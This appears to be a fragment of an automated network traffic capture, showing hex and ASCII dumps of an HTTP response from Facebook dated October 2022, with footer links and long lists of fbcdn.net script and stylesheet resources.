                                                                                                                Data Ascii: k">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT2KDX0_xm5tHV6EtlZy1FVE0SRsncVSt4wGO4MCE2w-J6mfa5CkrpsucEDN45BdGpUG6pvEEJ0XcbRs-p9DYP6KN7DqzC6p9a4h2C8Vro8p34ncbvS8ojItgeHFEqHcfX2tkK0p_WNDBF-YGO4Xwg"
                                                                                                                2022-10-13 11:08:18 UTC5701INData Raw: 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b
                                                                                                                Data Ascii: ef=pf" title="Make your next career move to our awesome company.">Careers</a></li><li><a data-nocookies="1" href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn about your privacy and Facebook.">Privacy</a></li><li><a href="/policies/cook
                                                                                                                2022-10-13 11:08:18 UTC5703INData Raw: 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 37 34 36 33 39 37 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 34 31 36 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 79 72 62 35 51 75 51 39 32 37 33 36 75 79 46 6f 22 7d 2c 22 35 38 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 6d 63 77 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37
                                                                                                                Data Ascii: ":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpData":{"1746397":{"r":1,"s":1}},"gkxData":{"4166":{"result":false,"hash":"AT7yrb5QuQ92736uyFo"},"588":{"result":true,"hash":"AT7B-2KeH1gOOVfLmcw"},"3212":{"result":false,"hash":"AT7
                                                                                                                2022-10-13 11:08:18 UTC5704INData Raw: 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 38 32 55 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30 56 2d 51 5f 7a 66 45 79 6b 7a 6e 4f 4d 54 45 22 7d 2c 22 31 30 39 39 38 39 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6b 6c 79 32 4c 53 5a 56 5f 44 4b 47 52 65 52 34 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 2c 22 71 70 6c 44 61 74 61 22 3a 7b 22 38 39 31 22 3a 7b 22 72 22 3a 31 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c
                                                                                                                Data Ascii: result":true,"hash":"AT66Oo5lY__5wUTp82U"},"5541":{"result":true,"hash":"AT70V-Q_zfEykznOMTE"},"1099893":{"result":false,"hash":"AT5kly2LSZV_DKGReR4"}},"qexData":{"644":{"r":null},"647":{"r":null}},"qplData":{"891":{"r":1}}})});requireLazy(["Bootloader"],
                                                                                                                2022-10-13 11:08:18 UTC5705INData Raw: 52 32 56 66 41 6c 4d 6f 44 4f 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 47 5c 2f 72 5c 2f 2d 4d 45 4a 79 49 32 56 48 6e 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 76 5c 2f 72 5c 2f 47 47 31 59 30 73 59 63 37 4d 79 2e 6a 73 3f 5f 6e 63 5f 78 3d
                                                                                                                Data Ascii: R2VfAlMoDO8.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/r\/-MEJyI2VHno.js?_nc_x=Ij3Wp8lg5Kz"},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yv\/r\/GG1Y0sYc7My.js?_nc_x=
                                                                                                                2022-10-13 11:08:18 UTC5707INData Raw: 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5a 5c 2f 72 5c 2f 78 34 45 79 70 39 6e 51 31 75 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 4c 70 78 52 35 71 55 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6a 5c 2f 72 5c 2f 42 39 75 4b 43 59 46 57 49 41 34 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 49 61 52 5c 2f 36 75 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74
                                                                                                                Data Ascii: ,"src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz"},"LpxR5qU":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yj\/r\/B9uKCYFWIA4.js?_nc_x=Ij3Wp8lg5Kz"},"IaR\/6uP":{"type":"js","src":"https:\/\/st
                                                                                                                2022-10-13 11:08:18 UTC5707INData Raw: 32 65 65 61 0d 0a 67 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 72 5c 2f 41 54 63 75 30 58 67 55 44 66 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 5a 45 43 34 52 72 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 53 5c 2f 72 5c 2f 6e 48 44 59 52 44 4c 35 4a 41 41 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 74 6a 6d 6b 2b 30 4b 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22
                                                                                                                Data Ascii: 2eeag":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/ATcu0XgUDfP.js?_nc_x=Ij3Wp8lg5Kz"},"ZEC4RrQ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yS\/r\/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz"},"tjmk+0K":{"type":"js"
                                                                                                                2022-10-13 11:08:18 UTC5709INData Raw: 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34 5c 2f 72 5c 2f 56 52 4b 79 57 79 69 6a 4e 42 39 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6e 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6c 68 59 7a 65 61 49 65 51 36 36 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 34 33 66 32 4c 2b 36 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22
                                                                                                                Data Ascii: ype":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/VRKyWyijNB9.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/l\/0,cross\/lhYzeaIeQ66.css?_nc_x=Ij3Wp8lg5Kz"},"43f2L+6":{"type":"js"
                                                                                                                2022-10-13 11:08:18 UTC5710INData Raw: 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 64 42 71 34 5c 2f 79 30 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6e 57 61 37 42 67 4c 32 6a 45 74 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 64 4b 41 4c 64 4e 35 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 7a 46 68 46 2d 66 33 6c 41 48 39 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 57 64 61 75 6b 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e
                                                                                                                Data Ascii: \/rsrc.php\/v3idBq4\/y0\/l\/en_US\/nWa7BgL2jEt.js?_nc_x=Ij3Wp8lg5Kz"},"dKALdN5":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/l\/0,cross\/zFhF-f3lAH9.css?_nc_x=Ij3Wp8lg5Kz"},"iWdauk4":{"type":"js","src":"https:\/\/static.xx.fbcdn.n
                                                                                                                2022-10-13 11:08:18 UTC5712INData Raw: 2f 79 79 5c 2f 72 5c 2f 34 6d 39 38 49 45 6e 37 39 48 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 47 70 51 46 42 77 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 73 5c 2f 72 5c 2f 42 31 51 6b 79 47 76 55 33 70 64 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 4d 61 77 6d 56 4a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 38 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 68 71 50
                                                                                                                Data Ascii: /yy\/r\/4m98IEn79HU.js?_nc_x=Ij3Wp8lg5Kz"},"GpQFBwL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/r\/B1QkyGvU3pd.js?_nc_x=Ij3Wp8lg5Kz"},"iMawmVJ":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/l\/0,cross\/hqP
                                                                                                                2022-10-13 11:08:18 UTC5713INData Raw: 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 53 77 54 73 57 68 64 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 59 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 4b 76 52 49 73 69 6f 74 68 73 4b 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 45 48 79 38 78 56 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 5f 42 52 44 30 43 53 55 75 46 37 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57
                                                                                                                Data Ascii: _nc_x=Ij3Wp8lg5Kz"},"SwTsWhd":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/l\/0,cross\/KvRIsiothsK.css?_nc_x=Ij3Wp8lg5Kz"},"EHy8xVL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/_BRD0CSUuF7.js?_nc_x=Ij3W
                                                                                                                2022-10-13 11:08:18 UTC5715INData Raw: 4b 65 2d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 51 46 36 45 73 30 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 52 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6f 65 5f 4a 4b 58 6e 58 79 4f 2d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 42 44 52 74 6b 2b 43 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 42 65 34 5c 2f 79 54 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 73 78 76 62 52 63
                                                                                                                Data Ascii: Ke-.js?_nc_x=Ij3Wp8lg5Kz"},"iQF6Es0":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yR\/l\/0,cross\/oe_JKXnXyO-.css?_nc_x=Ij3Wp8lg5Kz"},"BDRtk+C":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7Be4\/yT\/l\/en_US\/sxvbRc
                                                                                                                2022-10-13 11:08:18 UTC5716INData Raw: 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5a 56 30 65 47 52 4c 38 64 42 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 33 39 30 4f 72 69 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 7a 38 65 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 36 45 55 6a 4d 41 4f 5f 37 66 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 67 57 4d 4a 67 54 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f
                                                                                                                Data Ascii: \/l\/en_US\/ZV0eGRL8dBq.js?_nc_x=Ij3Wp8lg5Kz"},"x390Ori":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iz8e4\/yn\/l\/en_US\/6EUjMAO_7fU.js?_nc_x=Ij3Wp8lg5Kz"},"gWMJgTe":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/
                                                                                                                2022-10-13 11:08:18 UTC5718INData Raw: 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 56 76 56 46 77 38 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6e 5c 2f 72 5c 2f 41 57 65 70 76 66 2d 76 64 5a 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6d 6f 34 59 48 48 73 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 42 5c 2f 72 5c 2f 46 36 45 39 50 52 48 34 68 2d 42 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 5c 2f 72 4f 30 6c 62 6e 22
                                                                                                                Data Ascii: Wp8lg5Kz"},"VvVFw8n":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/r\/AWepvf-vdZG.js?_nc_x=Ij3Wp8lg5Kz"},"mo4YHHs":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yB\/r\/F6E9PRH4h-B.js?_nc_x=Ij3Wp8lg5Kz"},"\/rO0lbn"
                                                                                                                2022-10-13 11:08:18 UTC5719INData Raw: 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 0d 0a 31 65 37 38 0d 0a 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 2c 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 49 6e 70 75 74 22 3a 7b 22 72 22 3a 5b 22 5a 32 47 6a 56 75 39 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4c 69 76 65 22 3a 7b 22 72 22 3a 5b 22 32 5c 2f 6d 61 51 5c 2f 51 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 5c 2f 6f 64 52 52 34 57 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 67 67 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 50 79 63 43 55 45 4d 22 2c 22 5c 2f
                                                                                                                Data Ascii: EventFalcoEvent"1e78,"BanzaiScuba_DEPRECATED"],"r":["BIylKC4","hKY0QKT"]},"be":1},"Input":{"r":["Z2GjVu9"],"be":1},"Live":{"r":["2\/maQ\/Q","8zbEZtu","e9ANzw\/","n6W4xMH","vGt2mxz","\/o5YvO2","\/odRR4W"],"be":1},"Toggler":{"r":["8zbEZtu","PycCUEM","\/
                                                                                                                2022-10-13 11:08:18 UTC5721INData Raw: 51 46 42 77 4c 22 2c 22 79 53 65 57 37 48 67 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 69 4d 61 77 6d 56 4a 22 2c 22 53 49 5c 2f 37 33 4f 70 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 50 64 39 56 6a 78 6c 22 2c 22 35 49 32 6e 39 72 4c 22 2c 22 4c 70 78 52 35 71 55 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 4e 38 58 63 63 63 48 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 63 69 48 4d 6e 67 78 22 2c 22 54 37 65 75 57 4c 4b 22 2c 22 74 5c 2f 44 51 64 39 2b 22 2c 22 63 59 55 33 63 33 32 22 2c 22 35 56 78 43 64 34 48 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 41 6e 69 6d 61 74 69 6f 6e
                                                                                                                Data Ascii: QFBwL","ySeW7Hg","lWOvGTa","iMawmVJ","SI\/73Op","n6W4xMH","vGt2mxz","\/o5YvO2","Pd9Vjxl","5I2n9rL","LpxR5qU","hKY0QKT","BIylKC4","8mzgYu5","N8XcccH","IaR\/6uP","ciHMngx","T7euWLK","t\/DQd9+","cYU3c32","5VxCd4H","07JSiP0","dx\/AgpO"],"rds":{"m":["Animation
                                                                                                                2022-10-13 11:08:18 UTC5722INData Raw: 6b 2b 30 4b 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 50 79 63 43 55 45 4d 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 43 71 52 43 4a 4b 6c 22 2c 22 78 33 39 30 4f 72 69 22 2c 22 6c 76 58 36 66 6b 68 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 65 45 50 37 62 42 46 22 2c 22 5c 2f 6f 64 52 52 34 57 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 38
                                                                                                                Data Ascii: k+0K","Z2GjVu9","PycCUEM","h3ZzAmG","CqRCJKl","x390Ori","lvX6fkh","lWOvGTa","vGt2mxz","BIylKC4","8mzgYu5","eEP7bBF","\/odRR4W"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["hKY0QKT"]},"be":1},"AsyncDialog":{"r":["R5w1rCJ","X9nr65a","ZEC4RrQ","8
                                                                                                                2022-10-13 11:08:18 UTC5724INData Raw: 34 57 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 79 6c 4c 50 6b 6a 41 22 2c 22 79 53 65 57 37 48 67 22 2c 22 4c 70 78 52 35 71 55 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 5a 45 43 34
                                                                                                                Data Ascii: 4W","R5w1rCJ","ZEC4RrQ","e9ANzw\/","ylLPkjA","ySeW7Hg","LpxR5qU","07JSiP0"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"],"r":["hKY0QKT"]},"be":1},"ExceptionDialog":{"r":["R5w1rCJ","X9nr65a","ZEC4
                                                                                                                2022-10-13 11:08:18 UTC5725INData Raw: 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 6f 64 79 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 4f 64 70 4f 33 57 46 22 2c 22 6b 5a 55 78 35 76 6d 22 2c 22 4a 4a 44 51 59 4c 64 22 2c 22 79 6c 4c 50 6b 6a 41 22 2c 22 59 74 55 33 43 35 75 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 